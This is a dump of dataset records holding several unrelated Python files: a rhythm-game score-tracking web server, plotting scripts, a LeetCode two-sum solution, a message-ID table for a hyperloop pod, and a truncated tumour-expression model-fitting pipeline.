NewRecord.raw('select newrecord.achievements, newrecord.fc, newrecord.fs, newrecord.dxScore, chart.ds as ds, chart.level as level, chart.difficulty as diff, music.type as `type`, music.id as `id`, music.is_new as is_new, music.title as title from newrecord, chart, music where player_id = %s and chart_id = chart.id and chart.music_id = music.id', 293)\n records = []\n for record in r:\n elem = record_json(record)\n records.append(elem)\n return {\"records\": records, \"username\": \"TESTUSER\", \"additional_rating\": \"2100\"}\n\n\ndef get_dx_and_sd(player):\n l = NewRecord.raw('select newrecord.achievements, newrecord.fc, newrecord.fs, newrecord.dxScore, chart.ds as ds, chart.level as level, chart.difficulty as diff, music.type as `type`, music.id as `id`, music.is_new as is_new, music.title as title from newrecord, chart, music where player_id = %s and chart_id = chart.id and chart.music_id = music.id', player.id)\n l1 = []\n l2 = []\n for r in l:\n setattr(r, 'ra', r.ds * get_l(r.achievements)\n * min(100.5, r.achievements) / 100)\n if r.is_new:\n l2.append(r)\n else:\n l1.append(r)\n l1.sort(key=lambda x: x.ra, reverse=True)\n l2.sort(key=lambda x: x.ra, reverse=True)\n return l1[:25], l2[:15]\n\n\ndef get_dx_and_sd_for50(player):\n l = NewRecord.raw('select newrecord.achievements, newrecord.fc, newrecord.fs, newrecord.dxScore, chart.ds as ds, chart.level as level, chart.difficulty as diff, music.type as `type`, music.id as `id`, music.is_new as is_new, music.title as title from newrecord, chart, music where player_id = %s and chart_id = chart.id and chart.music_id = music.id', player.id)\n l1 = []\n l2 = []\n for r in l:\n setattr(r, 'ra', r.ds * get_l(r.achievements)\n * min(100.5, r.achievements) / 100)\n if r.is_new:\n l2.append(r)\n else:\n l1.append(r)\n l1.sort(key=lambda x: x.ra, reverse=True)\n l2.sort(key=lambda x: x.ra, reverse=True)\n return l1[:35], l2[:15]\n\n\ndef getplatelist(player, version: List[Dict]):\n l = NewRecord.raw('select newrecord.achievements, newrecord.fc, newrecord.fs,chart.level as level, chart.difficulty as diff, music.type as `type`, music.id as `id`, music.is_new as is_new, music.version as `version`, music.title as title from newrecord, chart, music where player_id = %s and chart_id = chart.id and chart.music_id = music.id', player.id)\n fl = recordList()\n vl = []\n for r in l:\n fl.append(r)\n for i in range(0, len(version)):\n vl += fl.filter(version=version[i])\n return vl\n\n\n@app.route(\"/query/player\", methods=['POST'])\nasync def query_player():\n obj = await request.json\n try:\n if \"qq\" in obj:\n p: Player = Player.get(Player.bind_qq == obj[\"qq\"])\n else:\n username = obj[\"username\"]\n p: Player = Player.get(Player.username == username)\n except Exception:\n return {\n \"message\": \"user not exists\"\n }, 400\n if p.privacy and \"username\" in obj:\n try:\n token = decode(request.cookies['jwt_token'])\n except KeyError:\n return {\"status\": \"error\", \"msg\": \"已设置隐私\"}, 403\n if token == {}:\n return {\"status\": \"error\", \"msg\": \"已设置隐私\"}, 403\n if token['exp'] < ts():\n return {\"status\": \"error\", \"msg\": \"会话过期\"}, 403\n if token['username'] != obj[\"username\"]:\n return {\"status\": \"error\", \"msg\": \"已设置隐私\"}, 403\n if \"b50\" in obj:\n sd, dx = get_dx_and_sd_for50(p)\n else:\n sd, dx = get_dx_and_sd(p)\n asyncio.create_task(compute_ra(p))\n nickname = p.nickname\n if nickname == \"\":\n nickname = p.username if len(p.username) <= 8 else p.username[:8] + '…'\n try:\n user_data = json.loads(p.user_data)\n except Exception:\n user_data = None\n return {\n \"username\": p.username,\n \"rating\": p.rating,\n \"additional_rating\": p.additional_rating,\n \"nickname\": nickname,\n \"plate\": p.plate,\n \"charts\": {\n \"sd\": [record_json(c) for c in sd],\n \"dx\": [record_json(c) for c in dx]\n },\n \"user_id\": p.user_id,\n \"user_data\": user_data\n }\n\n\n@app.route(\"/query/plate\", methods=['POST'])\nasync def query_plate():\n obj = await request.json\n try:\n if \"qq\" in obj:\n p: Player = Player.get(Player.bind_qq == obj[\"qq\"])\n else:\n username = obj[\"username\"]\n p: Player = Player.get(Player.username == username)\n except Exception:\n return {\"message\": \"user not exists\"}, 400\n if p.privacy and \"username\" in obj:\n try:\n token = decode(request.cookies['jwt_token'])\n except KeyError:\n return {\"status\": \"error\", \"msg\": \"已设置隐私\"}, 403\n if token == {}:\n return {\"status\": \"error\", \"msg\": \"已设置隐私\"}, 403\n if token['exp'] < ts():\n return {\"status\": \"error\", \"msg\": \"会话过期\"}, 403\n if token['username'] != obj[\"username\"]:\n return {\"status\": \"error\", \"msg\": \"已设置隐私\"}, 403\n v: List[Dict] = obj[\"version\"]\n vl = getplatelist(p, v)\n return {\n \"verlist\": [platerecord_json(c) for c in vl]\n }\n\n\nasync def compute_ra(player: Player):\n rating = 0\n sd, dx = get_dx_and_sd(player)\n for t in sd:\n rating += int(t.ra)\n for t in dx:\n rating += int(t.ra)\n player.rating = rating\n player.save()\n return rating\n\n\n@app.route(\"/player/update_records\", methods=['POST'])\n@login_required\nasync def update_records():\n global cs_need_update\n cs_need_update = True\n j = await request.get_json()\n dicts = {}\n if \"userId\" in j:\n try:\n for ml in j[\"userMusicList\"]:\n for m in ml[\"userMusicDetailList\"]:\n if str(m[\"musicId\"]) not in md_map:\n continue\n music = md_map[str(m[\"musicId\"])]\n level = m[\"level\"]\n achievement = m[\"achievement\"]\n fc = [\"\", \"fc\", \"fcp\", \"ap\", \"app\"][m[\"comboStatus\"]]\n fs = [\"\", \"fs\", \"fsp\", \"fsd\", \"fsdp\"][m[\"syncStatus\"]]\n dxScore = m[\"deluxscoreMax\"]\n cid = music[\"cids\"][level]\n dicts[cid] = (achievement / 10000.0, fc, fs, dxScore)\n g.user.user_id = j[\"userId\"]\n g.user.user_data = json.dumps(j[\"userData\"]) if \"userData\" in j else \"\"\n g.user.save()\n except Exception as e:\n return {\n \"message\": str(e)\n }, 400\n else:\n for record in j:\n # print(time.time())\n title = record['title']\n _type = record['type']\n level = record['level_index']\n m = get_music_by_title(md_cache, title, _type)\n if m is None or level >= len(m[\"cids\"]):\n continue\n cid = m[\"cids\"][level]\n dicts[cid] = (record[\"achievements\"], record[\"fc\"],\n record[\"fs\"], record[\"dxScore\"])\n rs = NewRecord.raw(\n 'select * from newrecord where player_id = %s', g.user.id)\n updates = []\n creates = []\n for r in rs:\n # print(r.chart_id)\n if r.chart_id in dicts:\n v = dicts[r.chart_id]\n r.achievements = v[0]\n r.fc = v[1]\n r.fs = v[2]\n r.dxScore = v[3]\n updates.append(r)\n del dicts[r.chart_id]\n # print(len(dicts))\n for k in dicts:\n v = dicts[k]\n creates.append({\"chart\": k, \"player\": g.user.id,\n \"fc\": v[1], \"fs\": v[2], \"dxScore\": v[3], \"achievements\": v[0]})\n NewRecord.insert_many(creates).execute()\n # print(updates)\n NewRecord.bulk_update(updates, fields=[\n NewRecord.achievements, NewRecord.fc, NewRecord.fs, NewRecord.dxScore])\n await compute_ra(g.user)\n return {\n \"message\": \"更新成功\",\n }\n\n\n@app.route(\"/player/update_record\", methods=['POST'])\n@login_required\nasync def update_record():\n # must be update.\n global cs_need_update\n cs_need_update = True\n record = await request.get_json()\n title = record['title']\n _type = record['type']\n level = record['level_index']\n m = get_music_by_title(md_cache, title, _type)\n if m is None:\n return\n cid = m[\"cids\"][level]\n r: NewRecord = NewRecord.get(\n (NewRecord.player == g.user.id) & (NewRecord.chart == cid))\n assert r\n r.achievements = record['achievements']\n r.fc = record['fc']\n r.fs = record['fs']\n r.save()\n await compute_ra(g.user)\n return {\n \"message\": \"更新成功\",\n }\n\n\n@app.route(\"/player/delete_records\", methods=['DELETE'])\n@login_required\nasync def delete_records():\n global cs_need_update\n cs_need_update = True\n nums = NewRecord.delete().where(NewRecord.player == g.user.id).execute()\n await compute_ra(g.user)\n return {\n \"message\": nums\n }\n\n\n@app.route(\"/rating_ranking\", methods=['GET'])\nasync def rating_ranking():\n players = Player.select()\n data = []\n for player in players:\n data.append({\"username\": player.username, \"ra\": player.rating})\n resp = await make_response(json.dumps(data, ensure_ascii=False))\n resp.headers['content-type'] = \"application/json; charset=utf-8\"\n return resp\n\n\n@app.route(\"/count_view\", methods=['GET'])\nasync def count_view():\n v: Views = Views.get()\n v.prober += 1\n v.save()\n return {\"views\": v.prober}\n\n\nasync def message_resp():\n today_ts = int((time.time() + 8 * 3600) / 86400) * 86400 - 8 * 3600\n results = Message.select(Message, Player).join(\n Player).where(Message.ts >= today_ts)\n l = []\n for r in results:\n l.append({\"text\": r.text, \"username\": r.player.username,\n \"ts\": r.ts, \"nickname\": r.nickname})\n resp = await make_response(json.dumps(l, ensure_ascii=False))\n resp.headers['content-type'] = \"application/json; charset=utf-8\"\n return resp\n\n\n@app.route(\"/message\", methods=['GET'])\nasync def message_g():\n return await message_resp()\n\n\n@app.route(\"/message\", methods=['POST'])\n@login_required\nasync def message():\n if request.method == 'POST':\n a = Message()\n a.player = g.user\n j = await request.get_json()\n a.text = j[\"text\"]\n a.nickname = j[\"nickname\"]\n a.ts = int(time.time())\n a.save(force_insert=True)\n return await message_resp()\n\n\n@app.route(\"/chart_stats\", methods=['GET'])\nasync def chart_stats():\n global cs_need_update\n global cs_cache\n if len(cs_cache) > 0:\n resp = await make_response(json.dumps(cs_cache, ensure_ascii=False))\n resp.headers['content-type'] = \"application/json; charset=utf-8\"\n return resp\n cursor = NewRecord.raw(\n 'select newrecord.chart_id, count(*) as cnt, avg(achievements) as `avg`,'\n ' sum(case when achievements >= 100 then 1 else 0 end) as sssp_count from newrecord group by chart_id'\n )\n data = defaultdict(lambda: [{}, {}, {}, {}, {}])\n for elem in cursor:\n data[elem.chart.music.id][elem.chart.level] = {\"count\": elem.cnt,\n \"avg\": elem.avg,\n \"sssp_count\": int(elem.sssp_count)\n }\n level_dict = defaultdict(lambda: [])\n md = md_cache\n for elem in md:\n key = elem['id']\n for i in range(len(elem['ds'])):\n elem2 = {\n \"key\": key,\n \"level_index\": i,\n \"count\": 1,\n \"avg\": 0,\n \"sssp_count\": 0\n }\n for _k in data[key][i]:\n elem2[_k] = data[key][i][_k]\n if elem2['count'] >= 30:\n level_dict[elem['level'][i]].append(elem2)\n for level in level_dict:\n level_dict[level].sort(\n key=lambda x: x['sssp_count'] / x['count'], reverse=True)\n ln = len(level_dict[level])\n for i in range(ln):\n elem = level_dict[level][i]\n rate = ((i + 0.5) / ln)\n if elem['count'] < 30:\n continue\n if rate <= 0.1:\n elem['tag'] = 'Very Easy'\n elif rate <= 0.3:\n elem['tag'] = 'Easy'\n elif rate < 0.7:\n elem['tag'] = 'Medium'\n elif rate < 0.9:\n elem['tag'] = 'Hard'\n else:\n elem['tag'] = 'Very Hard'\n elem['v'] = i\n elem['t'] = ln\n level_index = elem['level_index']\n key = elem['key']\n del elem['key']\n del elem['level_index']\n data[key][level_index] = elem\n cs_cache = data\n cs_need_update = False\n resp = await make_response(json.dumps(data, ensure_ascii=False))\n resp.headers['content-type'] = \"application/json; charset=utf-8\"\n return resp\n\n\napp.run(host='0.0.0.0', port=8333, loop=asyncio.get_event_loop())\n","sub_path":"database/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":19682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"323574520","text":"#!/usr/bin/env python\r\n#-*- coding: latin-1 -*-\r\n\r\n\"\"\"\r\nMake lineplot from data in sql query\r\n\"\"\"\r\n\r\nfrom get_TicketData import Get_TicketData as td\r\nfrom datetime import date as dat\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.cm as cm\r\nfrom matplotlib.backends.backend_pdf import PdfPages\r\n\r\n\r\n__author__ = \"Ralf kelzenberg\"\r\n__copyright__ = \"Copyright 2011, Ralf Kelzenberg\"\r\n__credits__ = [\"Ralf Kelzenberg\"]\r\n__license__ = \"GPL\"\r\n__version__ = \"3\"\r\n__maintainer__ = \"Ralf Kelzenberg\"\r\n__email__ = \"mail@ralfkelzenberg.de\"\r\n__status__ = \"Alpha\"\r\n\r\n\r\ndef show_lineplot(results, save=None, show=True):\r\n \"\"\"\r\n Show a plot of data given in input sql statement\r\n\r\n sql:\r\n string that contains a sql returning data in the format [category, date, value]\r\n \"\"\"\r\n n = 1\r\n cmap = cm.get_cmap()\r\n if(save):\r\n pp = PdfPages(save)\r\n\r\n for result in results:\r\n figure = plt.figure(n)\r\n #plt.subplot(len(results), 1, n)\r\n plt.title(\"Plot\" + str(n))\r\n\r\n lab = []\r\n for row in result:\r\n s = \"\"\r\n l = []\r\n for i in range(len(row)):\r\n if(i < len(row) - 2):\r\n s += str(row[i]).strip()\r\n if i < len(row) - 3:\r\n s += \", \"\r\n else:\r\n l.append(row[i])\r\n l.insert(0, s)\r\n lab.append(l)\r\n\r\n labels = list(set([x[0] for x in lab]))\r\n for i in range(len(labels)):\r\n plt.plot_date([x[-2] for x in lab if x[0] == labels[i]],\r\n [x[-1] for x in lab if x[0] == labels[i]],\r\n label=str(labels[i]), marker=None, linestyle=\"-\", color=cmap(float(i) / (len(labels) - 1)))\r\n plt.legend(loc=2)\r\n\r\n plt.xlabel('Zeit')\r\n if(lab[-1][-1] < 1):\r\n plt.ylabel('Quote')\r\n else:\r\n plt.ylabel('Anzahl')\r\n\r\n figure.autofmt_xdate()\r\n if(save):\r\n pp.savefig(figure)\r\n n += 1\r\n if(save):\r\n pp.close()\r\n if(show):\r\n plt.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n data = []\r\n data.append(td().get_Info(katList=[\"st1\"],\r\n bedDict={'skticket': \"SK Ticket\", \"region\": [3, 9]},\r\n interval=\"daily\", minAvg=100, startdate=dat(2012, 1, 1)))\r\n data.append(td().get_Info(katList=[\"st2\"],\r\n bedDict={'skticket': \"SK Ticket\", \"region\": [3, 9]},\r\n interval=\"daily\", minAvg=100, startdate=dat(2012, 1, 2), baseline=\"kunden\"))\r\n data.append(td().get_Info(katList=[\"st3\"],\r\n bedDict={'skticket': \"SK Ticket\", \"region\": [3, 9]},\r\n interval=\"daily\", minAvg=100, startdate=dat(2012, 2, 1)))\r\n show_lineplot(data, save=r\"C://Dokumente und Einstellungen//All Users//Desktop//PdfTest.pdf\", show=True)\r\n","sub_path":"naos-python/Source/YF/linegraph.py","file_name":"linegraph.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"310852119","text":"#\n# @lc app=leetcode.cn id=1 lang=python\n#\n# [1] 两数之和\n#\n\n# @lc code=start\nclass Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n length = len(nums)\n dic1 = {}\n for i in range(length):\n j = dic1.get(target-nums[i],-1)\n if not j == -1:\n return [j,i]\n dic1[nums[i]] = i\n\n \n \n# @lc code=end\n\n","sub_path":"Week_02/1.两数之和.py","file_name":"1.两数之和.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"522774144","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sys import exit\n\n\nq = 5.\nv0 = 10.\nDr = 20.\nomega0 = 1\nrho = 0.2\nN = 300\n\nL = (N/rho)**(1./3)\nL = 10.\nomega = 2*np.pi*omega0/L\n\ndef w(y):\n\treturn q*np.sin(omega*y)\ndef wp(y):\n\treturn q*omega*np.cos(omega*y)\n\ndef Ap(y):\n\tD = 1+w(y)*w(y)\n\treturn wp(y)*(1-w(y)*w(y))/(D*D)\ndef Bp(y):\n\tD= 1+w(y)*w(y)\n\treturn -2.*w(y)*wp(y)/(D*D)\n\ny = np.linspace(0,L,1000)\npx = Ap(y)\npy = Bp(y)\n\nc = -v0/(6*Dr)\n\nplt.plot(y,px*c,label='px')\nplt.plot(y,py*c,label='py')\n\nplt.legend()\nplt.tight_layout()\n\nplt.show()\n\n\n\n\n","sub_path":"magnetic_fixed_dt_flux/plot_magnetic.py","file_name":"plot_magnetic.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"141846588","text":"from datetime import date\r\nanonasci = int(input('digite o seu ano de nascimento'))\r\nano = date.today().year\r\nidade = ano - anonasci\r\nif idade < 18:\r\n print('ainda nao se alistou')\r\nelif idade > 18:\r\n print('ja se alistou')\r\nelse:\r\n print('esta na hora de se alistar')\r\n","sub_path":"python/exercicios/ex039.py","file_name":"ex039.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"602538427","text":"class MessageList():\n\tmessages = \t{\n\t\t\t\t'stop':{ #stop\n\t\t\t\t\t'id':'1',\n\t\t\t\t\t'data':''\n\t\t\t\t},\n\t\t\t\t'get_engine_status':{ #get engine status\n\t\t\t\t\t'id':'2',\n\t\t\t\t\t'data':''\n\t\t\t\t},\n\t\t\t\t'move':{ #move pod at given speed\n\t\t\t\t\t'id':'4',\n\t\t\t\t\t'data':'',\n\t\t\t\t\t'input_data': True\n\t\t\t\t},\n\t\t\t\t'get_engine_status_l':{ #get status of all engines\n\t\t\t\t\t'id':'5',\n\t\t\t\t\t'data':''\n\t\t\t\t},\n\t\t\t\t'engine_status_l':{ #engine L status\n\t\t\t\t\t'id':'6',\n\t\t\t\t\t'data':''\n\t\t\t\t},\n\t\t\t\t'engine_status_r':{ #engine R status\n\t\t\t\t\t'id':'7',\n\t\t\t\t\t'data':''\n\t\t\t\t},\n\t\t\t\t'tilt_l':{ #tilt engine L\n\t\t\t\t\t'id':'8',\n\t\t\t\t\t'data':'',\n\t\t\t\t\t'input_data': True\n\t\t\t\t},\n\t\t\t\t'tilt_r':{ #tilt engine R\n\t\t\t\t\t'id':'9',\n\t\t\t\t\t'data':'',\n\t\t\t\t\t'input_data': True\n\t\t\t\t},\n\t\t\t\t'start_l':{ #start engine L\n\t\t\t\t\t'id':'10',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'start_r':{ #start engine R\n\t\t\t\t\t'id':'11',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'stop_l':{ #stop engine L\n\t\t\t\t\t'id':'12',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'stop_r':{ #stop engine R\n\t\t\t\t\t'id':'13',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'start':{ #startup sequnce of pod\n\t\t\t\t\t'id':'14',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'uc_temp_req':{ #umbillical connector temp request message\n\t\t\t\t\t'id':'15',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'uc_temp_data':{ #umbillical connector temp data response\n\t\t\t\t\t'id':'16',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'batt_temp_req':{ #battery temp request\n\t\t\t\t\t'id':'17',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'batt_temp_data':{ #battery temp data response\n\t\t\t\t\t'id':'18',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'batt_power_req':{ #battery power level request\n\t\t\t\t\t'id':'19',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'batt_power_data':{ #battery power data level response\n\t\t\t\t\t'id':'20',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'so_temp_req':{ #standard outlet temperature request\n\t\t\t\t\t'id':'21',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'so_temp_data':{ #standard outlet temperature data response\n\t\t\t\t\t'id':'22',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'hover_height_req':{ #hover height request message\n\t\t\t\t\t'id':'23',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'hover_height_data':{ #hover height data response\n\t\t\t\t\t'id':'24',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'get_hover_height':{ #hover height request from ground station\n\t\t\t\t\t'id':'25',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'pod_temp_req':{ #pod cabin internal temperature request\n\t\t\t\t\t'id':'26',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'pod_temp_data':{ #pod cabin internal temperature data\n\t\t\t\t\t'id':'27',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'pod_attitude_req':{ #pod attitude request\n\t\t\t\t\t'id':'28',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'pod_attitude_data':{ #pod attitude data\n\t\t\t\t\t'id':'29',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'pod_pressure_req':{ #pod cabin internal pressure req\n\t\t\t\t\t'id':'30',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'pod_pressure_data':{ #pod cabin internal pressure data\n\t\t\t\t\t'id':'31',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'pod_position_req':{ #pod position request\n\t\t\t\t\t'id':'32',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'pod_position_data':{ #pod positon data\n\t\t\t\t\t'id':'33',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'get_pod_status':{ #pod positon data\n\t\t\t\t\t'id':'34',\n\t\t\t\t\t'data':'',\n\t\t\t\t}\n\t\t\t}\n\n\tids = \t{\n\t\t\t\t'1':{ #stop\n\t\t\t\t\t'name':'stop',\n\t\t\t\t\t'data':''\n\t\t\t\t},\n\t\t\t\t'2':{ #get engine status\n\t\t\t\t\t'name':'get_engine_status',\n\t\t\t\t\t'data':''\n\t\t\t\t},\n\t\t\t\t'4':{ #move pod at given speed\n\t\t\t\t\t'name':'move',\n\t\t\t\t\t'data':'',\n\t\t\t\t\t'input_data': True\n\t\t\t\t},\n\t\t\t\t'5':{ #get status of all engines\n\t\t\t\t\t'name':'get_engine_status_l',\n\t\t\t\t\t'data':''\n\t\t\t\t},\n\t\t\t\t'6':{ #engine L status\n\t\t\t\t\t'name':'engine_status_l',\n\t\t\t\t\t'data':''\n\t\t\t\t},\n\t\t\t\t'7':{ #engine R status\n\t\t\t\t\t'name':'engine_status_r',\n\t\t\t\t\t'data':''\n\t\t\t\t},\n\t\t\t\t'8':{ #tilt engine L\n\t\t\t\t\t'name':'tilt_l',\n\t\t\t\t\t'data':'',\n\t\t\t\t\t'input_data': True\n\t\t\t\t},\n\t\t\t\t'9':{ #tilt engine R\n\t\t\t\t\t'name':'tilt_r',\n\t\t\t\t\t'data':'',\n\t\t\t\t\t'input_data': True\n\t\t\t\t},\n\t\t\t\t'10':{ #start engine L\n\t\t\t\t\t'name':'start_l',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'11':{ #start engine R\n\t\t\t\t\t'name':'start_r',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'12':{ #stop engine L\n\t\t\t\t\t'name':'stop_l',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'13':{ #stop engine R\n\t\t\t\t\t'name':'stop_r',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'14':{ #startup sequnce of pod\n\t\t\t\t\t'name':'start',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'15':{ #umbillical connector temp request message\n\t\t\t\t\t'name':'uc_temp_req',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'16':{ #umbillical connector temp data response\n\t\t\t\t\t'name':'uc_temp_data',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'17':{ #battery temp request\n\t\t\t\t\t'name':'batt_temp_req',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'18':{ #battery temp data response\n\t\t\t\t\t'name':'batt_temp_data',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'19':{ #battery power level request\n\t\t\t\t\t'name':'batt_power_req',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'20':{ #battery power data level response\n\t\t\t\t\t'name':'batt_power_data',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'21':{ #standard outlet temperature request\n\t\t\t\t\t'name':'so_temp_req',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'22':{ #standard outlet temperature data response\n\t\t\t\t\t'name':'so_temp_data',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'23':{ #hover height request message\n\t\t\t\t\t'name':'hover_height_req',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'24':{ #hover height data response\n\t\t\t\t\t'name':'hover_height_data',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'25':{ #hover height request from ground station\n\t\t\t\t\t'name':'get_hover_height',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'26':{ #pod cabin internal temperature request\n\t\t\t\t\t'name':'pod_temp_req',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'27':{ #pod cabin internal temperature data\n\t\t\t\t\t'name':'pod_temp_data',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'28':{ #pod attitude request\n\t\t\t\t\t'name':'pod_attitude_req',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'29':{ #pod attitude data\n\t\t\t\t\t'name':'pod_attitude_data',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'30':{ #pod cabin internal pressure req\n\t\t\t\t\t'name':'pod_pressure_req',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'31':{ #pod cabin internal pressure data\n\t\t\t\t\t'name':'pod_pressure_data',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'32':{ #pod position request\n\t\t\t\t\t'name':'pod_position_req',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'33':{ #pod positon data\n\t\t\t\t\t'name':'pod_position_data',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'34':{ #pod positon data\n\t\t\t\t\t'name':'get_pod_status',\n\t\t\t\t\t'data':'',\n\t\t\t\t}\n\t\t\t}\n\n\n","sub_path":"IDs.py","file_name":"IDs.py","file_ext":"py","file_size_in_byte":5917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"443490850","text":"#!/usr/bin/env python2.7\n\nimport sys\nsys.path.append('/opt/hydra/')\n\nimport argparse\nimport bnpy\nimport logging\nimport numpy as np\nimport os\nimport pandas as pd\nimport shutil\n\nimport library.analysis as hydra\nfrom library.utils import mkdir_p\nfrom library.fit import get_assignments\n\n\nens_to_hugo = {}\nwith open('/opt/typhon/data/EnsGeneID_Hugo_Observed_Conversions.txt') as f:\n header = next(f)\n for line in f:\n hugo, ens = line.strip().split('\\t')\n ens_to_hugo[ens] = hugo\n\n\ndef fit_models(data, diagnosis, output_dir):\n logger = logging.getLogger('root')\n models_pth = os.path.join('/opt/typhon/models/', diagnosis)\n\n # Load Enrichment Analysis\n for model in os.listdir(models_pth):\n logger.info(\"Applying %s model\" % model)\n model_pth = os.path.join(models_pth, model, model)\n hmodel = bnpy.ioutil.ModelReader.load_model_at_prefix(model_pth,\n prefix=model)\n # Load original training data\n train_pth = os.path.join(models_pth, model, model, 'training-data.tsv')\n train_data = pd.read_csv(train_pth, sep='\\t', index_col=0)\n\n fit = hydra.PreFitMultivariateModel(hmodel, train_data)\n assignment, subgsea = fit.sub_cluster_gsea(data['TPM'])\n\n # Place model in cluster\n logger.debug(\"Place in cluster %d\" % assignment)\n if pd.isnull(assignment):\n logger.info(\"WARNING: Could not classify sample!\")\n continue\n\n output_dir = os.path.join(output_dir, model)\n mkdir_p(output_dir)\n feature_src = os.path.join(models_pth, model, 'features', str(assignment), \"cluster-GSEA.tsv\")\n feature_dest = os.path.join(output_dir, 'CLUSTER_GSEA_%d' % assignment)\n shutil.copyfile(feature_src, feature_dest)\n\n sub_dest = os.path.join(output_dir, 'SUBCLUSTER_GSEA_%d' % assignment)\n subgsea.sort_values(\"NES\", ascending=False).to_csv(sub_dest, sep='\\t')\n\ndef main():\n \"\"\"\n Typhon Pipeline\n \"\"\"\n parser = argparse.ArgumentParser(description=main.__doc__,\n formatter_class=argparse.RawTextHelpFormatter)\n\n parser.add_argument('--diagnosis',\n help='Patient diagnosis',\n required=True)\n\n parser.add_argument('--RSEM',\n help='Path to N-of-1 RSEM file.',\n required=True)\n\n parser.add_argument('-o', '--output-dir',\n help='Output directory',\n default='typhon-output')\n\n parser.add_argument('--debug',\n action='store_true',\n default=False)\n\n args = parser.parse_args()\n\n available_models = ['MYCN-NA-Neuroblastoma']\n\n if args.diagnosis not in available_models:\n msg = \"Please select one of the following diagnoses:\\n%s\" % '\\n'.join(available_models)\n raise ValueError(msg)\n\n # Set up logger\n level = logging.INFO\n\n # Make the output directory if it doesn't already exist\n mkdir_p(args.output_dir)\n\n logging.basicConfig(filename=os.path.join(args.output_dir, 'typhon.log'),\n level=level)\n logging.getLogger().addHandler(logging.StreamHandler())\n logger = logging.getLogger('root')\n\n\n # Read in RSEM file\n data = pd.read_csv(args.RSEM, sep='\\t')\n\n # Convert to hugo ids\n data['hugo'] = data['gene_id'].map(ens_to_hugo)\n tpm = data.reindex(['hugo', 'TPM'], axis=1).groupby('hugo').sum()\n exp = np.log2(tpm + 1)\n\n logger.info(\"Starting run...\")\n fit_models(exp, args.diagnosis, args.output_dir)\n\n\nif __name__ == '__main__':\n 